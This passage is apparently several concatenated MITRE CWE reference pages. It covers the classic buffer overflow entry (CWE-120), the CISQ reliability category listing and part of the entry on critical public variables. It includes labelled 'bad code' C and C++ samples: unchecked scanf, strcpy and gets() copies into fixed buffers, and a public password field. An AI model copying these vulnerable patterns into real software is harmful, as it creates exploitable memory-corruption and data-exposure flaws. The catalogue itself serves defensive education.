ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	20	Improper Input Validation

Modes Of Introduction

Phase	Note
Implementation

Applicable Platforms

Languages

Class: Memory-Unsafe (Undetermined Prevalence)

C (Often Prevalent)

C++ (Often Prevalent)

Class: Assembly (Undetermined Prevalence)

Likelihood Of Exploit

High

Demonstrative Examples

Example 1

The following code asks the user to enter their last name and then attempts to store the value entered in the last_name array.

(bad code)

Example Language: C

char last_name[20];
printf ("Enter your last name: ");
scanf ("%s", last_name);

The problem with the code above is that it does not restrict or limit the size of the name entered by the user. If the user enters "Very_very_long_last_name" which is 24 characters long, then a buffer overflow will occur since the array can only hold 20 characters total.

Example 2

The following code attempts to create a local copy of a buffer to perform some manipulations to the data.

(bad code)

Example Language: C

void manipulate_string(char * string){

char buf[24];
strcpy(buf, string);
...

}

However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter.

Example 3

The code below calls the gets() function to read in data from the command line.

(bad code)

Example Language: C

char buf[24];
printf("Please enter your name and press <Enter>\n");
gets(buf);
...

}

However, gets() is inherently unsafe, because it copies all input from STDIN to the buffer without checking size. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition.

Example 4

In the following example, a server accepts connections from a client and processes the client request. After accepting a client connection, the program will obtain client information using the gethostbyaddr method, copy the hostname of the client that connected to a local variable and output the hostname of the client to a log file.

(bad code)

Example Language: C

...

struct hostent *clienthp;
char hostname[MAX_LEN];

// create server socket, bind to server address and listen on socket
...

// accept client connections and process requests
int count = 0;
for (count = 0; count < MAX_CONNECTIONS; count++) {

int clientlen = sizeof(struct sockaddr_in);
int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr, &clientlen);

if (clientsocket >= 0) {

clienthp = gethostbyaddr((char*) &clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);
strcpy(hostname, clienthp->h_name);
logOutput("Accepted client connection from host ", hostname);

// process client request
...
close(clientsocket);

}

}
close(serversocket);

...

However, the hostname of the client that connected may be longer than the allocated size for the local hostname variable. This will result in a buffer overflow when copying the client hostname to the local variable using the strcpy method.

Selected Observed Examples

Reference	Description
CVE-2000-1094	buffer overflow using command with long argument
CVE-1999-0046	buffer overflow in local program using long environment variable
CVE-2002-1337	buffer overflow in comment characters, when product increments a counter for a ">" but does not decrement for "<"
CVE-2003-0595	By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers.
CVE-2001-0191	By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers.

Weakness Ordinalities

Ordinality	Description
Resultant	(where the weakness is typically related to the presence of some other weaknesses)
Primary	(where the weakness exists independent of other weaknesses)

Detection Methods

Method	Details
Automated Static Analysis	This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. Effectiveness: High Note:Detection techniques for buffer-related errors are more mature than for most other weakness types.
Automated Dynamic Analysis	This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.
Manual Analysis	Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large.
Automated Dynamic Analysis	Use tools that are integrated during compilation to insert runtime error-checking mechanisms related to memory safety errors, such as AddressSanitizer (ASan) for C/C++ [REF-1518]. Effectiveness: Moderate Note:Crafted inputs are necessary to reach the code containing the error, such as generated by fuzzers. Also, these tools may reduce performance, and they only report the error condition - not the original mistake that led to the error.
Automated Static Analysis - Binary or Bytecode	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Bytecode Weakness Analysis - including disassembler + source code weakness analysis Binary Weakness Analysis - including disassembler + source code weakness analysis Effectiveness: High
Manual Static Analysis - Binary or Bytecode	According to SOAR [REF-1479], the following detection techniques may be useful: Cost effective for partial coverage: Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies Effectiveness: SOAR Partial
Dynamic Analysis with Automated Results Interpretation	According to SOAR [REF-1479], the following detection techniques may be useful: Cost effective for partial coverage: Web Application Scanner Web Services Scanner Database Scanners Effectiveness: SOAR Partial
Dynamic Analysis with Manual Results Interpretation	According to SOAR [REF-1479], the following detection techniques may be useful: Cost effective for partial coverage: Fuzz Tester Framework-based Fuzzer Effectiveness: SOAR Partial
Manual Static Analysis - Source Code	According to SOAR [REF-1479], the following detection techniques may be useful: Cost effective for partial coverage: Focused Manual Spotcheck - Focused manual analysis of source Manual Source Code Review (not inspections) Effectiveness: SOAR Partial
Automated Static Analysis - Source Code	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Source code Weakness Analyzer Context-configured Source Code Weakness Analyzer Effectiveness: High
Architecture or Design Review	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Formal Methods / Correct-By-Construction Cost effective for partial coverage: Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) Effectiveness: High

Functional Areas

Memory Management

Affected Resources

Memory

Memberships

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	722	OWASP Top Ten 2004 Category A1 - Unvalidated Input
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	726	OWASP Top Ten 2004 Category A5 - Buffer Overflows
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	741	CERT C Secure Coding Standard (2008) Chapter 8 - Characters and Strings (STR)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	802	2010 Top 25 - Risky Resource Management
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	865	2011 Top 25 - Risky Resource Management
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	875	CERT C++ Secure Coding Section 07 - Characters and Strings (STR)
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	970	SFP Secondary Cluster: Faulty Buffer Access
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1129	CISQ Quality Measures (2016) - Reliability
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1161	SEI CERT C Coding Standard - Guidelines 07. Characters and Strings (STR)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1399	Comprehensive Categorization: Memory Safety
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1435	Weaknesses in the 2025 CWE Top 25 Most Dangerous Software Weaknesses

Vulnerability Mapping Notes

Usage	ALLOWED-WITH-REVIEW (this CWE ID could be used to map to real-world vulnerabilities in limited situations requiring careful review)
Reason	Frequent Misuse
Rationale	There are some indications that this CWE ID might be misused and selected simply because it mentions "buffer overflow" - an increasingly vague term. This CWE entry is only appropriate for "Buffer Copy" operations (not buffer reads), in which where there is no "Checking [the] Size of Input", and (by implication of the copy) writing past the end of the buffer.
Comments	If the vulnerability being analyzed involves out-of-bounds reads, then consider CWE-125 or descendants. For root cause analysis: if there is any input validation, consider children of CWE-20 such as CWE-1284. If there is a calculation error for buffer sizes, consider CWE-131 or similar.

Notes

Relationship

At the code level, stack-based and heap-based overflows do not differ significantly, so there usually is not a need to distinguish them. From the attacker perspective, they can be quite different, since different techniques are required to exploit them.

Terminology

There is significant inconsistency regarding the "buffer overflow" term, which can have multiple interpretations and uses. Many people mean "writing past the end of a buffer." Others mean "writing past the end of a buffer, or before the beginning of a buffer." Still others might include "read" in the term.

Other

A buffer overflow condition exists when a product attempts to put more data in a buffer than it can hold, or when it attempts to put data in a memory area outside of the boundaries of a buffer. The simplest type of error, and the most common cause of buffer overflows, is the "classic" case in which the product copies the buffer without restricting how much data is copied. Other variants exist, but the existence of a classic overflow strongly suggests that the programmer is not considering even the most basic of security protections.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
PLOVER			Unbounded Transfer ('classic overflow')
7 Pernicious Kingdoms			Buffer Overflow
CLASP			Buffer overflow
OWASP Top Ten 2004	A1	CWE More Specific	Unvalidated Input
OWASP Top Ten 2004	A5	CWE More Specific	Buffer Overflows
CERT C Secure Coding	STR31-C	Exact	Guarantee that storage for strings has sufficient space for character data and the null terminator
WASC	7		Buffer Overflow
Software Fault Patterns	SFP8		Faulty Buffer Access
OMG ASCSM	ASCSM-CWE-120
OMG ASCRM	ASCRM-CWE-120

Related Attack Patterns

CAPEC-ID	Attack Pattern Name
CAPEC-10	Buffer Overflow via Environment Variables
CAPEC-100	Overflow Buffers
CAPEC-14	Client-side Injection-induced Buffer Overflow
CAPEC-24	Filter Failure through Buffer Overflow
CAPEC-42	MIME Conversion
CAPEC-44	Overflow Binary Resource File
CAPEC-45	Buffer Overflow via Symbolic Links
CAPEC-46	Overflow Variables and Tags
CAPEC-47	Buffer Overflow via Parameter Expansion
CAPEC-67	String Format Overflow in syslog()
CAPEC-8	Buffer Overflow in an API Call
CAPEC-9	Buffer Overflow in Local Command-Line Utilities
CAPEC-92	Forced Integer Overflow

References

[REF-7]	Michael Howard and David LeBlanc. "Writing Secure Code". Chapter 5, "Public Enemy #1: The Buffer Overrun" Page 127. 2nd Edition. Microsoft Press. 2002-12-04. <https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223>.
[REF-44]	Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 5: Buffer Overruns." Page 89. McGraw-Hill. 2010.
[REF-56]	Microsoft. "Using the Strsafe.h Functions". <https://learn.microsoft.com/en-us/windows/win32/menurc/strsafe-ovw?redirectedfrom=MSDN>. (URL validated: 2023-04-07)
[REF-57]	Matt Messier and John Viega. "Safe C String Library v1.0.3". <http://www.gnu-darwin.org/www001/ports-1.5a-CURRENT/devel/safestr/work/safestr-1.0.3/doc/safestr.html>. (URL validated: 2023-04-07)
[REF-58]	Michael Howard. "Address Space Layout Randomization in Windows Vista". <https://learn.microsoft.com/en-us/archive/blogs/michael_howard/address-space-layout-randomization-in-windows-vista>. (URL validated: 2023-04-07)
[REF-59]	Arjan van de Ven. "Limiting buffer overflows with ExecShield". <https://archive.is/saAFo>. (URL validated: 2023-04-07)
[REF-60]	"PaX". <https://en.wikipedia.org/wiki/Executable_space_protection#PaX>. (URL validated: 2023-04-07)
[REF-74]	Jason Lam. "Top 25 Series - Rank 3 - Classic Buffer Overflow". SANS Software Security Institute. 2010-03-02. <https://www.sans.org/blog/top-25-series-rank-3-classic-buffer-overflow>. (URL validated: 2025-07-29)
[REF-61]	Microsoft. "Understanding DEP as a mitigation technology part 1". <https://msrc.microsoft.com/blog/2009/06/understanding-dep-as-a-mitigation-technology-part-1/>. (URL validated: 2023-04-07)
[REF-76]	Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://web.archive.org/web/20211209014121/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/least-privilege>. (URL validated: 2023-04-07)
[REF-62]	Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 3, "Nonexecutable Stack", Page 76. 1st Edition. Addison Wesley. 2006.
[REF-62]	Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 5, "Protection Mechanisms", Page 189. 1st Edition. Addison Wesley. 2006.
[REF-62]	Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 8, "C String Handling", Page 388. 1st Edition. Addison Wesley. 2006.
[REF-64]	Grant Murphy. "Position Independent Executables (PIE)". Red Hat. 2012-11-28. <https://www.redhat.com/en/blog/position-independent-executables-pie>. (URL validated: 2023-04-07)
[REF-961]	Object Management Group (OMG). "Automated Source Code Reliability Measure (ASCRM)". ASCRM-CWE-120. 2016-01. <http://www.omg.org/spec/ASCRM/1.0/>.
[REF-962]	Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-120. 2016-01. <http://www.omg.org/spec/ASCSM/1.0/>.
[REF-1332]	John Richard Moser. "Prelink and address space randomization". 2006-07-05. <https://lwn.net/Articles/190139/>. (URL validated: 2023-04-26)
[REF-1333]	Dmitry Evtyushkin, Dmitry Ponomarev, Nael Abu-Ghazaleh. "Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR". 2016. <http://www.cs.ucr.edu/~nael/pubs/micro16.pdf>. (URL validated: 2023-04-26)
[REF-1334]	D3FEND. "Stack Frame Canary Validation (D3-SFCV)". 2023. <https://d3fend.mitre.org/technique/d3f:StackFrameCanaryValidation/>. (URL validated: 2023-04-26)
[REF-1335]	D3FEND. "Segment Address Offset Randomization (D3-SAOR)". 2023. <https://d3fend.mitre.org/technique/d3f:SegmentAddressOffsetRandomization/>. (URL validated: 2023-04-26)
[REF-1336]	D3FEND. "Process Segment Execution Prevention (D3-PSEP)". 2023. <https://d3fend.mitre.org/technique/d3f:ProcessSegmentExecutionPrevention/>. (URL validated: 2023-04-26)
[REF-1337]	Alexander Sotirov and Mark Dowd. "Bypassing Browser Memory Protections: Setting back browser security by 10 years". Memory information leaks. 2008. <https://www.blackhat.com/presentations/bh-usa-08/Sotirov_Dowd/bh08-sotirov-dowd.pdf>. (URL validated: 2023-04-26)
[REF-1479]	Gregory Larsen, E. Kenneth Hong Fong, David A. Wheeler and Rama S. Moorthy. "State-of-the-Art Resources (SOAR) for Software Vulnerability Detection, Test, and Evaluation". 2014-07. <https://www.ida.org/-/media/feature/publications/s/st/stateoftheart-resources-soar-for-software-vulnerability-detection-test-and-evaluation/p-5061.ashx>. (URL validated: 2025-09-05)
[REF-1518]	"AddressSanitizer". <https://clang.llvm.org/docs/AddressSanitizer.html>. (URL validated: 2025-12-10)

Content History

Submissions
Submission Date	Submitter	Organization
2006-07-19 (CWE Draft 3, 2006-07-19)	PLOVER
2006-07-19 (CWE Draft 3, 2006-07-19)
Modifications
Modification Date	Modifier	Organization
2026-01-21 (CWE 4.19.1, 2026-01-21)	CWE Content Team	MITRE
2026-01-21 (CWE 4.19.1, 2026-01-21)	updated Relationships
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Applicable_Platforms, Detection_Factors, References, Terminology_Notes
2025-09-09 (CWE 4.18, 2025-09-09)	CWE Content Team	MITRE
2025-09-09 (CWE 4.18, 2025-09-09)	updated Description, Detection_Factors, Diagram, Other_Notes, References
2025-04-03 (CWE 4.17, 2025-04-03)	CWE Content Team	MITRE
2025-04-03 (CWE 4.17, 2025-04-03)	updated Applicable_Platforms, Relationships
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Potential_Mitigations, References, Relationships
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Common_Consequences, Description
2022-10-13	CWE Content Team	MITRE
2022-10-13	updated References
2021-07-20	CWE Content Team	MITRE
2021-07-20	updated Potential_Mitigations
2021-03-15	CWE Content Team	MITRE
2021-03-15	updated Demonstrative_Examples
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Demonstrative_Examples, Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Alternate_Terms, Relationships
2020-06-25	CWE Content Team	MITRE
2020-06-25	updated Common_Consequences, Potential_Mitigations
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Potential_Mitigations, Relationships
2019-06-20	CWE Content Team	MITRE
2019-06-20	updated Relationships
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2018-03-27	CWE Content Team	MITRE
2018-03-27	updated References
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Detection_Factors, Relationships, Taxonomy_Mappings
2014-02-18	CWE Content Team	MITRE
2014-02-18	updated Potential_Mitigations, References
2012-10-30	CWE Content Team	MITRE
2012-10-30	updated Potential_Mitigations
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated References, Relationships
2011-09-13	CWE Content Team	MITRE
2011-09-13	updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2011-06-27	CWE Content Team	MITRE
2011-06-27	updated Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences
2011-03-29	CWE Content Team	MITRE
2011-03-29	updated Demonstrative_Examples, Description
2010-12-13	CWE Content Team	MITRE
2010-12-13	updated Potential_Mitigations
2010-09-27	CWE Content Team	MITRE
2010-09-27	updated Potential_Mitigations
2010-06-21	CWE Content Team	MITRE
2010-06-21	updated Common_Consequences, Potential_Mitigations, References
2010-04-05	CWE Content Team	MITRE
2010-04-05	updated Demonstrative_Examples, Related_Attack_Patterns
2010-02-16	CWE Content Team	MITRE
2010-02-16	updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type
2009-10-29	CWE Content Team	MITRE
2009-10-29	updated Common_Consequences, Relationships
2009-07-27	CWE Content Team	MITRE
2009-07-27	updated Other_Notes, Potential_Mitigations, Relationships
2009-01-12	CWE Content Team	MITRE
2009-01-12	updated Common_Consequences, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships
2008-11-24	CWE Content Team	MITRE
2008-11-24	updated Other_Notes, Relationships, Taxonomy_Mappings
2008-10-14	CWE Content Team	MITRE
2008-10-14	updated Alternate_Terms, Description, Name, Other_Notes, Terminology_Notes
2008-10-10	CWE Content Team	MITRE
2008-10-10	Changed name and description to more clearly emphasize the "classic" nature of the overflow.
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2008-08-15		Veracode
2008-08-15	Suggested OWASP Top Ten 2004 mapping
2008-08-01		KDM Analytics
2008-08-01	added/updated white box definitions
2008-07-01	Eric Dalci	Cigital
2008-07-01	updated Time_of_Introduction
Previous Entry Names
Change Date	Previous Entry Name
2008-10-14	Unbounded Transfer ('Classic Buffer Overflow')

Category ID: 1129

Vulnerability Mapping: PROHIBITED This CWE ID must not be used to map to real-world vulnerabilities

Summary

Membership

Nature	Type	ID	Name
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1128	CISQ Quality Measures (2016)
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	120	Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	252	Unchecked Return Value
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	396	Declaration of Catch for Generic Exception
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	397	Declaration of Throws for Generic Exception
HasMember	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	456	Missing Initialization of a Variable
HasMember	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	674	Uncontrolled Recursion
HasMember	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	704	Incorrect Type Conversion or Cast
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	772	Missing Release of Resource after Effective Lifetime
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	788	Access of Memory Location After End of Buffer
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1045	Parent Class with a Virtual Destructor and a Child Class without a Virtual Destructor
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1047	Modules with Circular Dependencies
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1051	Initialization with Hard-Coded Network Resource Configuration Data
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1056	Invokable Control Element with Variadic Parameters
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1058	Invokable Control Element in Multi-Thread Context with non-Final Static Storable or Member Element
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1062	Parent Class with References to Child Class
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1065	Runtime Resource Management Control Element in a Component Built to Run on Application Servers
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1066	Missing Serialization Control Element
HasMember	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	1069	Empty Exception Block
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1070	Serializable Data Element Containing non-Serializable Item Elements
HasMember	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	1077	Floating Point Comparison with Incorrect Operator
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1079	Parent Class without Virtual Destructor Method
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1082	Class Instance Self Destruction Control Element
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1083	Data Access from Outside Expected Data Manager Component
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1087	Class with Virtual Method without a Virtual Destructor
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1088	Synchronous Access of Remote Resource without Timeout
HasMember	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	1096	Singleton Class Instance Creation without Proper Locking or Synchronization
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1097	Persistent Storable Data Element without Associated Comparison Control Element
HasMember	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	1098	Data Element containing Pointer Item without Proper Copy Control Element

Vulnerability Mapping Notes

Usage: PROHIBITED

(this CWE ID must not be used to map to real-world vulnerabilities)

Reason: Category

Rationale:

This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves.

Comments:

See member weaknesses of this category.

References

[REF-961] Object Management Group (OMG). "Automated Source Code Reliability Measure (ASCRM)". 2016-01. <http://www.omg.org/spec/ASCRM/1.0/>.

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-23 (CWE 3.2, 2019-01-03)	CWE Content Team	MITRE
2018-07-23 (CWE 3.2, 2019-01-03)	Constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001.
Modifications
Modification Date	Modifier	Organization
2020-06-25	CWE Content Team	MITRE
2020-06-25	updated References
2021-03-15	CWE Content Team	MITRE
2021-03-15	updated Description, Name
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Mapping_Notes
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2025-09-09 (CWE 4.18, 2025-09-09)	CWE Content Team	MITRE
2025-09-09 (CWE 4.18, 2025-09-09)	updated References
Previous Entry Names
Change Date	Previous Entry Name
2021-03-15	CISQ Quality Measures - Reliability

Weakness ID: 766

Vulnerability Mapping: ALLOWED This CWE ID may be used to map to real-world vulnerabilities
Abstraction: Base Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

View customized information:

Description

The product declares a critical variable, field, or member to be public when intended security policy requires it to be private.

Extended Description

This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities.

Common Consequences

Impact	Details
Read Application Data; Modify Application Data	Scope: Integrity, Confidentiality Making a critical variable public allows anyone with access to the object in which the variable is contained to alter or read the value.
Reduce Maintainability	Scope: Other

Potential Mitigations

Phase(s)	Mitigation
Implementation	Data should be private, static, and final whenever possible. This will assure that your code is protected by instantiating early, preventing access, and preventing tampering.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	732	Incorrect Permission Assignment for Critical Resource
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	1061	Insufficient Encapsulation

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	275	Permission Issues

Modes Of Introduction

Phase	Note
Implementation

Applicable Platforms

Languages

C++ (Undetermined Prevalence)

C# (Undetermined Prevalence)

Java (Undetermined Prevalence)

Demonstrative Examples

Example 1

The following example declares a critical variable public, making it accessible to anyone with access to the object in which it is contained.

(bad code)

Example Language: C++

public: char* password;

Instead, the critical data should be declared private.

(good code)

Example Language: C++

private: char* password;

Even though this example declares the password to be private, there are other possible issues with this implementation, such as the possibility of recovering the password from process memory (CWE-257).

Example 2

The following example shows a basic user account class that includes member variables for the username and password as well as a public constructor for the class and a public method to authorize access to the user account.

(bad code)

Example Language: C++

#define MAX_PASSWORD_LENGTH 15
#define MAX_USERNAME_LENGTH 15

class UserAccount
{

public:

UserAccount(char *username, char *password)
{

if ((strlen(username) > MAX_USERNAME_LENGTH) ||
(strlen(password) > MAX_PASSWORD_LENGTH)) {

ExitError("Invalid username or password");

}
strcpy(this->username, username);
